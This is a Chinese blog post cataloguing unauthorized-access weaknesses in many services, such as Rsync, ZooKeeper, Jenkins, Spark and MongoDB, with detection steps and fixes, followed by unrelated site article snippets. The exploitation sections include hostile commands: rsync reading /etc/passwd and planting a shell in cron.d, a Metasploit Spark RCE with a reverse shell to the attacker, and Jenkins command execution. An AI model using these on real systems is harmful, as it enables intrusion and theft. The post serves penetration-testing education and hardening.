未授权访问漏洞总结

news2024/11/26 16:31:29

以下总结了常见的未授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~

目录

FTP未授权访问(21)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

LDAP未授权访问(389)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Rsync未授权访问(873)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

ZooKeeper未授权访问(2181)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

 Docker未授权访问(2375)

Docker Registry未授权访问(5000)

漏洞原理

漏洞利用

漏洞修复

Kibana未授权访问(5601)

漏洞原理

漏洞利用

漏洞修复

VNC未授权访问(5900、5901)

漏洞原理

漏洞检测

漏洞利用

修复方法

CouchDB未授权访问(5984)

漏洞原理

漏洞利用

漏洞修复

Apache Spark未授权访问(6066、8081、8082)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Redis未授权访问(6379)

Weblogic未授权访问(7001)

 JBOSS未授权访问(8080)

Jenkins未授权访问(8080)

漏洞原理

漏洞利用

漏洞修复

Kubernetes API Server未授权(8080、10250)

漏洞原理

漏洞利用

漏洞修复

Active MQ未授权访问(8161)

漏洞原理

漏洞利用

漏洞修复

Jupyter Notebook未授权访问(8888)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

Elasticsearch未授权访问(9200、9300)

漏洞原理

漏洞利用

漏洞修复

Zabbix未授权访问(10051)

漏洞原理

漏洞利用

漏洞修复

 Memcached未授权访问(11211)

漏洞原理

漏洞利用

漏洞修复

RabbitMQ未授权访问(15672、15692、25672)

漏洞原理

漏洞利用

漏洞修复

MongoDB未授权访问(27017)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

NFS未授权访问(2049、20048)

漏洞原理

漏洞利用

漏洞修复

Dubbo未授权访问(28096)

漏洞原理

漏洞利用

漏洞修复

Druid未授权访问

漏洞原理

漏洞利用

漏洞修复

Solr未授权访问

漏洞原理

漏洞利用

SpringBoot Actuator 未授权访问

漏洞原理

漏洞利用

漏洞修复

SwaggerUI未授权访问

漏洞利用

修复方法

 Harbor未授权添加管理员漏洞

漏洞原理


FTP未授权访问(21)

FTP即文件传输协议,使用客户/服务器模式与使用 TCP 传输,属于网络传输协议的应用层,默认使用20、21号两个端口,一个数据端口和一个命令端口,端口20是数据端口,用于文件在客户端和服务器之间传输数据流。端口21是命令端口,用于传输控制流,接受客户端发出的相关FTP命令与参数。

漏洞原理

由于FTP使用弱口令或者启用了匿名登录功能,容易被攻击者攻击,发生恶意文件上传或更严重的入侵行为。

漏洞检测

端口扫描检测,可以使用nmap工具。

漏洞利用

使用匿名用户连接

[root@centos7 vsftpd]# ftp 192.168.75.122
Connected to 192.168.75.122(192.168.75.122).
220 (vsFTPd 3.0.2)
Name (192.168.75.122:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/"

有关于FTP匿名登录利用的有一个VSFTPD2.3.4笑脸漏洞:FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透_ftp匿名登录漏洞-CSDN博客

关于这个漏洞,只要用户输入的用户名包含连续的:)字符,就会自动在6200端口打开一个后门。

漏洞修复

  • 禁止匿名登录
  • 配置强密码

LDAP未授权访问(389)

LDAP即轻型目录访问协议,默认使用389端口,LDAP底层一般使用TCP或UDP作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。

漏洞原理

未对LDAP的访问进行密码验证,导致未授权访问。

漏洞检测

检测脚本参考

# python
# _*_  coding:utf-8 _*_
from ldap3 import Connection,Server,ALL
def ldap_anonymous(ip):
    try:
        server = Server(ip,get_info=ALL,connect_timeout=1)
        conn = Connection(server, auto_bind=True)
        print "[+] ldap login for anonymous"
        conn.closed
    except:
        #pass
        print '[-] checking for ldap anonymous fail'

漏洞利用

使用LdapBrowser直接连入,获取敏感信息。

LDAP是一个用于浏览和管理LDAP服务器的工具。

漏洞修复

  • 修改LDAP的ACL(访问控制列表),禁止匿名访问
  • 设置LDAP访问白名单或黑名单

Rsync未授权访问(873)

Rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAM快速同步多台主机间的文件和目录,默认运行在873端口。

漏洞原理

由于rsync的配置不当,导致允许任何人未授权访问rsync,上传本地文件,下载服务器文件等。

漏洞检测

  • 端口扫描
  • 或者在kali使用rsync命令进行检测
rsync rsync://ip:873/

漏洞利用

可以直接使用rsync工具进行利用

#利用rsync下载passwd文件
rsync rsync://ip:873/src/etc/passwd ./
#查看下载的passwd文件
cat passwd

#利用rsync写入shell文件
rsync -av shell rsync://ip:873/src/etc/cron.d/shell

漏洞修复

更改rsync默认配置文件/etc/rsyncd.conf,添加或修改参数:

  • 访问控制;设置host allow,限制允许访问主机的IP。

  • 权限控制;设置read only,将模块设置成只读。

  • 访问认证;设置auth、secrets,认证成功才能调用服务。

  • 模块隐藏;设置list,将模块隐藏。

ZooKeeper未授权访问(2181)

ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。

漏洞原理

ZooKeeper默认开放2181端口,没有对ZooKeeper进行访问控制,攻击者可通过执行envi命令获得系统大量的敏感信息包括系统名称、Java环境等,任意用户在网络可达的情况下可以进行未授权读取数据甚至杀死服务。

漏洞检测

使用nmap扫描端口

漏洞利用

#列出连接的客户端的统计信息
stat |ncat ip 2181

#测试服务器是否正常运行
echo ruok |ncat ip 2181

#列出未完成的请求
echo reqs |ncat ip 2181

#打印有关服务环境的详细信息
echo envi |ncat ip 2181

#列出未完成的会话和临时节点
echo dump |ncat ip 2181

漏洞修复

  • 为ZooKeeper配置相应的访问权限
  • 设置防火墙策略
  • 禁止把ZooKeeper直接暴露在公网

 Docker未授权访问(2375)

Docker未授权访问漏洞详解-CSDN博客

Docker Registry未授权访问(5000)

漏洞原理

默认5000端口,开放远程API,可以docker命令,通过url操作docker。

漏洞利用

端口扫描检测

#获取仓库列表
http://ip:5000/v2/_catalog

#获取指定仓库中镜像的tags列表
http://ip:5000/v2/geoglobe-servicemgr/tags/list

漏洞修复

设置ACL,只允许信任ip进行连接。

Kibana未授权访问(5601)

Kibana 是一款开源的数据分析和可视化平台,它是 Elastic Stack 成员之一,设计用于和 Elasticsearch 协作。可以使用 Kibana 对 Elasticsearch 索引中的数据进行搜索、查看、交互操作。

漏洞原理

kibana没有做安全的登录认证,外部能够随意访问数据,造成数据泄露。

漏洞利用

未授权访问的页面,无需账号密码可以直接登录。

http://192.168.126.130:5601/

https://192.168.126.130/app/kibana#

http://192.168.126.130:5601/app/kibana#/

漏洞修复

  • 设置kibana监听本地地址,并设置ElasticSearch登录的账号和密码;
  • 设置防火墙策略,限定IP访问服务;

VNC未授权访问(5900、5901)

VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。

漏洞原理

默认端口为5900、5901.VNC未授权访问可以造成恶意用户直接控制受控主机。

漏洞检测

检测可以使用nmap进行扫描,查看是否开放5900、5901端口。

可以使用msfconsole工具检测模块进行批量检测

(1) 在 kali 下运行 msfconsolemsfconsole。

(2) 调用 VNC 未授权检测模块use auxiliary/scanner/vnc/vnxnoneauth。

(3) 显示有哪些选项show options。

(4) 设置地址段set rhosts ip 或 段。

(5) 设置线程set threads 50。

(6) 开始扫描run。

漏洞利用

直接使用VNC客户端输入目标服务器IP进行连接即可,连接成功可以控制目标服务器。

修复方法

(1) 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。

(2) 以最小权限的普通用户身份运行操作系统。

CouchDB未授权访问(5984)

Apache CouchDB 是一个开源数据库,默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。

漏洞原理

HTTP Server默认开启,且没有进行验证,绑定在0.0.0.0上,所有用户均可以通过API访问导致未授权访问。在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。

漏洞利用

使用nmap扫描端口

然后未授权访问其页面,也可以通过curl拉取页面信息

curl ip:5984/_config

漏洞修复

  • 指定CouchDB绑定的IP:在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改为 127.0.0.1,修改后只有本机才能访问。
  • 设置访问密码:在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。
  • 设置www-authenticate,强制认证。

Apache Spark未授权访问(6066、8081、8082)

Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。

漏洞原理

如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向master节点提交一个应用,master节点会分发给slave节点执行应用。如果应用中包含恶意代码,会导致任意代码执行,威胁spark集群整体的安全性。

漏洞检测

nmap扫描开放端口

漏洞利用

使用msf工具进行getshell

use exploit/linux/http/spark_unauth_rce

set payload java/meterpreter/reverse_tcp

set rhost 目标ip

set rport 6066

set lhost 攻击机ip

set lport 4444

set srvhost 攻击机ip

set srvport 8080

exploit

漏洞修复

  • 对外关闭敏感端口;
  • 配置用户权限认证;

Redis未授权访问(6379)

Redis未授权访问漏洞详解(全面)_redis未授权访问漏洞编号-CSDN博客

Weblogic未授权访问(7001)

Weblogic常见漏洞详解_weblogic漏洞-CSDN博客

 JBOSS未授权访问(8080)

JBOSS未授权漏洞漏洞总结-CSDN博客

Jenkins未授权访问(8080)

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

漏洞原理

默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。

漏洞利用

使用nmap进行端口扫描

输入url,进行未授权访问

http://ip:8080/manage

http://ip:8080/script

然后在后台页面执行系统命令

#命令格式
println 'whoami'.execute().text

漏洞修复

  • 对后台控制页面做登录验证限制;
  • 升级Jenkins至新版本;
  • 禁止把Jenkins直接暴露在公网;

Kubernetes API Server未授权(8080、10250)

Kubernetes 是一个全新的基于容器技术的分布式架构解决方案,是 Google 开源的一个容器集群管理系统,Kubernetes 简称 K8S。

漏洞原理

kubernets服务正常启动后会开放两个端口:Localhost Port(默认8080)、Secure Port(默认6443)。这两个端口都提供了API Server,一个通过web访问(而10250端口是kubelet API的HTTPS端口),一个通过kubectl客户端进行调用。如果没有进行合理的配置验证和权限,那么攻击者可以通过这两个接口去获取容器的权限。

漏洞利用

使用nmap进行端口扫描

访问https://ip/10250/pods获取环境变量、运行的容器信息、命名空间等信息。

漏洞修复

  • 进行授权认证;
  • 使用Service Account令牌;
  • 设置防火墙策略,限定IP访问服务;

Active MQ未授权访问(8161)

ActiveMQ是一款流行的开源消息服务器(就是消息中间件)。

漏洞原理

ActiveMQ服务是默认没有配置安全参数的,这导致攻击者可以在默认配置下发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。

漏洞利用

默认配置下,默认端口为8161,默认账号/密码为admin/admin

漏洞修复

  • 禁止未授权访问:修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true
  • 设置强口令:修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码

Jupyter Notebook未授权访问(8888)

Jupyter Notebook是一个交互式笔记本,支持运行 40 多种编程语言,用于创建和共享程序文档,支持实时代码。

漏洞原理

如果管理员未配置密码,将导致未授权访问漏洞,攻击者可以在其中创建一个console并很仔细任意python代码和命令。

漏洞利用

靶场搭建

这里使用vulhub搭建漏洞

cd vulhub/jupyter/notebook-rce
docker-compose up -d

漏洞利用

访问http://ip:8888未授权进入后台页面

然后在New->Terminal创建控制台

便可以执行任意命令

漏洞修复

  • 开启身份验证,防止未经授权用户访问。
  • 访问控制策略,限制IP访问,绑定固定IP。

Elasticsearch未授权访问(9200、9300)

Elasticsearch是一款Java编写的企业级搜索服务引擎。被广泛应用于实时日志分析处理、信息检索、以及数据的多维查询和统计分析等场景。

漏洞原理

启动服务默认会开放9200端口或9300端口,可被攻击者未授权访问进行非法操作。

漏洞利用

使用nmap进行端口扫描

然后访问url,查看敏感数据

http://localhost:9200

http://localhost:9200/_cat/    //查看目录

http://localhost:9200/_cat/indices

http://localhost:9200/_river/_search //查看数据库敏感信息

http://localhost:9200/_nodes         //查看节点数据

http://localhost:9200/_plugin/head/  //web管理界面(安装了head插件)

漏洞修复

  • 访问控制策略,限制IP访问,绑定固定IP;
  • 在config/elasticsearch.yml中为9200端口设置认证等;

Zabbix未授权访问(10051)

Zabbix是一个基于web界面的提供分布式系统监视以及网络监控功能的企业级的开源解决方案。

漏洞原理

如果管理员没有更改默认配置,那么默认开放端口为10051,且无需账号密码即可登录后台。其中web后台是由PHP编写,用来显示数据库中的结果。

漏洞利用

使用nmap进行端口扫描

然后无需账号密码即可访问后台页面:http://ip:8080/zabbix.php

漏洞修复

  • 设置Zabbix的复杂口令,禁用Guest登录功能;
  • zabbix的server和agent都不要以root启动,不要设置AllowRoot=1;
  • 禁止agent执行run,不要设置EnableRemoteCommands=1;

 Memcached未授权访问(11211)

Memcached是由C语言编写的一个自由开源的、高性能的、分布式的内存对象缓存系统。内存存储可以减少数据库访问次数,提高Web应用次数。

Memcached与Redis有一些相似,它们都是内存存储数据库。不同点就是Memcached可以存储图图片、视频等数据,但是Redis可以存储list、set等的复杂数据类型,而Memcached只支持存储简答的数据类型,而且Redis只使用单核,而Memcached是可以使用多核的。总而言之,Redis适合存储小数据,Memcached适合存储大数据。

漏洞原理

依然是不需要密码即可访问。

默认端口为11211.

漏洞利用

1、使用nmap进行远程扫描,存在11211端口

nmap -p 11211 rhost-ip

2、使用telent远程登录,可以直接登录成功

telnet rhost-ip

漏洞修复

  • 如果Memcached只在内网使用,可在Memcached启动的时候指定绑定的IP地址为127.0.0.1.
memcached -d -m 1024 -u root -l 127.0.0.1-p 11211 -c 1024 -P /tmp/memcached.pid
  • 如果Memcached需要对外提供服务,可以配置iptables规则进行访问控制
#配置iptables规则,只允许192.168.15.249对11211端口进行访问
iptables -A INPUT -p tcp -s 192.168.15.249 --dport 11211 -j ACCEPT

#保存规则
service iptables save

#重启iptables
service iptables restart

RabbitMQ未授权访问(15672、15692、25672)

RabbitMQ是非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。

漏洞原理

在默认配置下,账号密码已知,且默认端口对外开放,攻击者可以未授权访问窃取数据。

漏洞利用

使用端口扫描

访问url页面,默认账号密码都为guest

http://ip:15672

http://ip:15692

http://ip:25672

漏洞修复

  • 修改为强密码,删除默认的账号guest;
  • 禁止对外网开放,仅限于内部访问;

MongoDB未授权访问(27017)

MongoDB数据库由C++编写,主要是为了提供Web应用提供可扩展的高性能数据存储解决方案。MongoDB是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。它支持的数据结构非常松散,是类似json的bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝大部分功能,而且还支持对数据建立索引。

漏洞原理

MongoDB数据库安装完成之后默认空口令导致攻击者无需账号就可以直接登录,进行增删改查操作。

默认端口:27017

漏洞利用

靶场搭建

攻击机:kai

靶机:Ubuntu(需要使用docker环境搭建)

1、拉取MongoDB镜像文件

docker pull mongo

2、创建容器并将MongoDB运行

docker run -d -p 27017:27017 mongo

3、查看运行端口

docker ps -a

4、攻击机扫描端口

漏洞利用

参考链接:MongoDB 未授权访问漏洞利用-CSDN博客

1、在kali里面导入MongoDB公共GPG密钥:

wget -qO - https://www.mongodb.org/static/pgp/server-5.0.asc | sudo apt-key add -

2、创建一个列表用于配置下载列表和下载源

echo "deb http://repo.mongodb.org/apt/debian buster/mongodb-org/5.0 main" | sudo tee /etc/apt/sources.list.d/mongodb-org-5.0.list

3、重新加载更新源

apt-get update

4、安装MongoDB的最新稳定版本

apt-get install -y mongodb-org

 如果这里出现libssl1.1不能下载的报错,可以更新源,然后再次进行下载。解决方法参考:解决E: Unable to correct problems, you have held broken packages.(亲测有效)-CSDN博客

5、启动MongoDB进程

systemctl start mongod

6、直接使用命令进行连接(无口令连接)

mongo --host 192.168.122.1 --port 27017

7、连接后即可查看用户、数据库等信息。

8、然后创建一个管理员账号

#切换到admin库:
> use admin
switched to db admin
 
 
#创建用户
> db.createUser(
  {
    user: "myUserAdmin",
    pwd: "Passw0rd",
    roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]
  }
)
 
 
#创建成功后提示信息:Successfully added user: {
    "user" : "myUserAdmin",
    "roles" : [
        {
            "role" : "userAdminAnyDatabase",
            "db" : "admin"
        }
    ]
}

9、ssh登录系统,账号密码为上面创建账户的账号密码。

除了上面较复杂的过程,也可以使用msf集成工具进行攻击。

在探测存在27017端口后,可以使用

msf6 > use auxiliary/scanner/mongodb/mongodb_login

漏洞修复

  • 如果mongodb只需在本地使用,建议只在本地开启监听服务
  • 如果mongodb只对内网提供服务,简体禁止将MongoDB服务发布在互联网上,并在主机上通过防火墙限制访问源IP
  • 最大的漏洞成因就是可以无口令进行登录,所以建议启动基于角色的登录认证功能。

NFS未授权访问(2049、20048)

NFS是UNIX表示层协议,能让使用者访问网络别处的文件就像在使用自己计算机一样。

漏洞原理

NFS配置不当,未限制对外访问,导致共享目录泄露。

漏洞利用

#安装nfs客户端
apt install nfs-common

#查看nfs服务器上的共享目录
showmount -e ip

#挂载到本地
mount -t nfs ip:/grdata /mnt

#卸载共享目录
umount /mnt

或者在windows系统上也可以直接利用映射网络驱动器。

漏洞修复

  • 利用iptables限制端口2049和20048端口的访问,禁止外部访问;
  • 设置/etc/exports,对访问进行控

Dubbo未授权访问(28096)

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。

漏洞原理

因配置不当而导致未授权访问漏洞

漏洞利用

扫描端口后直接连接进入dubbo服务

#连接进入dubbo服务
telent ip port

#查看框架情况
status -l

漏洞修复

  • 配置dubbo认证;
  • 设置防火墙策略,限定IP访问;

Druid未授权访问

Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控。

漏洞原理

首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。

漏洞利用

无需登录,即可登录Druid监控页面,访问以下url

/druid/index.html

/druid/websession.html

/druid/datasource.html

/druid/sql.html

/druid/spring.html

漏洞修复

  • 配置访问账号密码;
  • 禁止对外网开放访问;

Solr未授权访问

Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。

漏洞原理

配置不当导致可以任意未授权访问,可查询所有数据库信息,甚至可读取系统任意文件,获取shell。

漏洞利用

访问如下url

http://xx.xx.com/solr/admin

https://xx.xx.com/solr/admin

漏洞修复

  • 配置solr访问控制权限;
  • 禁止将solr暴露在公网;

SpringBoot Actuator 未授权访问

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。

漏洞原理

在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。

漏洞利用

 

漏洞修复

  •     禁用/env接口;
  •     升级到SpringBoot Actuator 2.0;
  •     禁止对外开放;

SwaggerUI未授权访问

Swagger 是一个规范且完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。

漏洞利用

访问以下url

/api

/api-docs

/api-docs/swagger.json

/api.html

/api/api-docs

/api/apidocs

/api/doc

/api/swagger

/api/swagger-ui

/api/swagger-ui.html

/api/swagger-ui.html/

/api/swagger-ui.json

/api/swagger.json

/api/swagger/

/api/swagger/ui

/api/swagger/ui/

/api/swaggerui

/api/swaggerui/

/api/v1/

/api/v1/api-docs

/api/v1/apidocs

/api/v1/swagger

/api/v1/swagger-ui

/api/v1/swagger-ui.html

/api/v1/swagger-ui.json

/api/v1/swagger.json

/api/v1/swagger/

/api/v2

/api/v2/api-docs

/api/v2/apidocs

/api/v2/swagger

/api/v2/swagger-ui

/api/v2/swagger-ui.html

/api/v2/swagger-ui.json

/api/v2/swagger.json

/api/v2/swagger/

/api/v3

/apidocs

/apidocs/swagger.json

/doc.html

/docs/

/druid/index.html

/graphql

/libs/swaggerui

/libs/swaggerui/

/spring-security-oauth-resource/swagger-ui.html

/spring-security-rest/api/swagger-ui.html

/sw/swagger-ui.html

/swagger

/swagger-resources

/swagger-resources/configuration/security

/swagger-resources/configuration/security/

/swagger-resources/configuration/ui

/swagger-resources/configuration/ui/

/swagger-ui

/swagger-ui.html

/swagger-ui.html#/api-memory-controller

/swagger-ui.html/

/swagger-ui.json

/swagger-ui/swagger.json

/swagger.json

/swagger.yml

/swagger/

/swagger/index.html

/swagger/static/index.html

/swagger/swagger-ui.html

/swagger/ui/

/Swagger/ui/index

/swagger/ui/index

/swagger/v1/swagger.json

/swagger/v2/swagger.json

/template/swagger-ui.html

/user/swagger-ui.html

/user/swagger-ui.html/

/v1.x/swagger-ui.html

/v1/api-docs

/v1/swagger.json

/v2/api-docs

/v3/api-docs

修复方法

设置访问权限

 Harbor未授权添加管理员漏洞

漏洞原理

Harbor未授权添加任意管理员漏洞。攻击者可通过构造特定的字符串,在未授权的情况下直接创建管理员账号,从而接管Harbor镜像仓库。

参考这篇文章:Harbor未授权创建管理员漏洞(CVE-2019-16097)_harbor未授权添加管理员漏洞-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1835077.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Ubuntu网络管理命令:ifconfig

安装Ubuntu桌面系统(虚拟机)_虚拟机安装ubuntu桌面版-CSDN博客 关于ifconfig命令,在11.1节已经介绍过了。通过该命令可以查看和配置网络接口。ifconfig是一个比较古老的命令,在Ubuntu 22以及其他的许多发行版中,已经不…

Playwright-html-report源码解析

执行命令生成html格式报告 Playwright在执行完成测试,支持生成html格式的测试报告,如下图所示,使用"npx playwright test"执行测试,执行完成后,会提示“npx playwright show-report”命令。执行该命令&#…

AI大模型探索之路-实战篇:智能化IT领域搜索引擎之HuggingFace网站在线搜索

系列篇章💥 No.文章1AI大模型探索之路-实战篇:智能化IT领域搜索引擎的构建与初步实践2AI大模型探索之路-实战篇:智能化IT领域搜索引擎之GLM-4大模型技术的实践探索3AI大模型探索之路-实战篇:智能化IT领域搜索引擎之知乎网站数据获…

【乐吾乐2D可视化组态编辑器】导航

支持点击图元,切换画面或跳转链接。 乐吾乐2D可视化组态编辑器地址:https://2d.le5le.com/ 切换画面 1. 添加事件 2. 设置事件行为 事件行为"发送消息",消息名选择"导航"。 3. 配置消息参数 消息参数,…

LeetCode 48.旋转图像

1.做题要求: 2.从此题我们可以看出规律为第几行要变为倒数第几列,所以我们最好先把二维数组存入一维数组中,然后先从最后一列遍历,把一维数组里的元素,依次等于遍历的元素即可: void rotate(int** matrix, int matrixSize, int*…

1984-2022年全球河流和湖泊表面积 (Surface Area of Rivers and Lakes,SARL)数据集

简介 Nyberg 等人(2024 年)开发的 "河流和湖泊表面积(SARL)"数据集对 38 年间(1984-2022 年)河流和湖泊的水面面积变化进行了全面分析。这个分辨率为 30 米的全球数据集为了解地表水的动态提供了…

一文读懂 Transformer 神经网络模型

今天我们来聊一下人工智能(AI)生态领域相关的技术 - Transformer 神经网络模型 。 自从最新的大型语言模型(LLaM)的发布,例如 OpenAI 的 GPT 系列、开源模型 Bloom 以及谷歌发布的 LaMDA 等,Transformer 模…

java线程安全 ,死锁以及线程状态的介绍与使用

线程安全 1.什么时候发生:当多个线程访问同一个资源时,导致了数据有问题1.线程安全问题–>线程不安全的代码 public class MyTicket implements Runnable{//定义100张票int ticket 100;Overridepublic void run() {while(true){if (ticket>0){System.out.println(Thre…

【PL理论】(31) 类型系统:静态分析 (Static Analysis) | 静态类型系统 | 什么是类型?

💭 写在前面:本章我们将进入类型系统的讲解,回顾一下之前我们整理的 F- 语言,然后介绍一下静态分析和静态类型系统。讨论程序员该如何处理一些 bug,有没有完美的静态分析器。 目录 0x00 回顾:F- 语言 0x…

Part 4.4 树形动态规划

树形动态规划,即在树上进行的动态规划。 因为树的递归性质,树形动态规划一般都是递归求解的。 没有上司的舞会 题目描述 某大学有 n n n 个职员,编号为 1 … n 1\ldots n 1…n。 他们之间有从属关系,也就是说他们的关系就像…

Sectigo OV通配符SSL证书多少钱?

在网络安全领域,SSL数字证书起着至关重要的作用,尤其是在保护网站和用户信息方面。而Sectigo OV通配符证书是一种常用的数字证书之一,它能够为同一域名下的多个子域名提供保护,还能够通过企业验证来增强安全性。那么,对…

对input输入框的正则限制

一、0-100的整数 正则&#xff1a; const inputRules ref([{required: false,trigger: "blur",validator: (rule, value, callback) > {const reg /^[0-9]$/; // 只允许整数if ((0 < value && value < 100 && reg.test(value)) ||valu…

如何打开azw/azw3文件?两个步骤解决

要打开AZW或AZW3格式的电子书&#xff0c;遵循以下步骤&#xff0c;无论你是Windows、Mac用户&#xff0c;还是使用移动设备&#xff0c;都可以轻松阅读这些亚马逊Kindle专用格式的电子书&#xff1a; 第一步&#xff1a;安装NeatReader&#xff1a; 访问NeatReader的官方网站或…

MySQl基础入门⑯【操作视图】完结

上一边文章内容 表准备 CREATE TABLE Students (id INT AUTO_INCREMENT PRIMARY KEY,name VARCHAR(100),email VARCHAR(255),major VARCHAR(100),score int,phone_number VARCHAR(20),entry_year INT,salary DECIMAL(10, 2) );数据准备 INSERT INTO Students (id, name, ema…

谷歌可穿戴设备与生成式AI模型PH-LLM:打造个性化健康监测与指导的新纪元

随着移动和可穿戴设备的普及&#xff0c;它们为个人健康监测提供了前所未有的机会&#xff0c;通过收集步数、心率变异性、睡眠持续时间等连续、精细和纵向数据&#xff0c;帮助用户实时跟踪自己的健康状况。这些数据不仅可以用于简单的监测&#xff0c;还可以结合生成式人工智…

什么是模型轻量化?如何自动进行模型轻量化?

轻量化是已经是3D可视化业界人所共知的一个概念&#xff0c;虽然至今没有任何严谨的学术或者理论定义&#xff0c;但是这个概念已经几乎成为了行业的标准。它的大意是说&#xff0c;一个适用用于浏览器端渲染的模型数据&#xff0c;包括几何数据和行业数据&#xff0c;必然可以…

数据库、中台、报表平台之间的关系

我最近在接触报表平台和中台&#xff0c;发现他们跟我平常用的数据库不是一个东西。然后&#xff0c;我开始了摸索他们的过程&#xff0c;终于&#xff0c;我在理清他们的关系以后&#xff0c;简单写一个入门级的区分。 数据库&#xff1a; 定义&#xff1a; 数据库是被长期存…

MySQL 下载及安装教程

MySQL是一款开源的关系数据库管理系统&#xff0c;被广泛应用于各种应用程序和网站的数据管理中。以下是下载和安装MySQL的详细步骤。 1. 访问MySQL官方网站 首先&#xff0c;打开你的浏览器&#xff0c;访问MySQL官方网站&#xff1a; MySQL官方网站: https://www.mysql.com …

同三维T80004EHU 高清HDMI/USB编码器

1路HDMI或1路USB输入&#xff0c;带1路3.5音频输入&#xff0c;高清1080P60 来百度APP畅享高清图片 产品简介&#xff1a; 同三维T80004EHU 高清 HDMI/USB编码器是一款1路HDMI或1路USB高清编码器&#xff0c;。可将 HDMI 或USB视频源编码压缩成网络流&#xff0c;通过有线网络…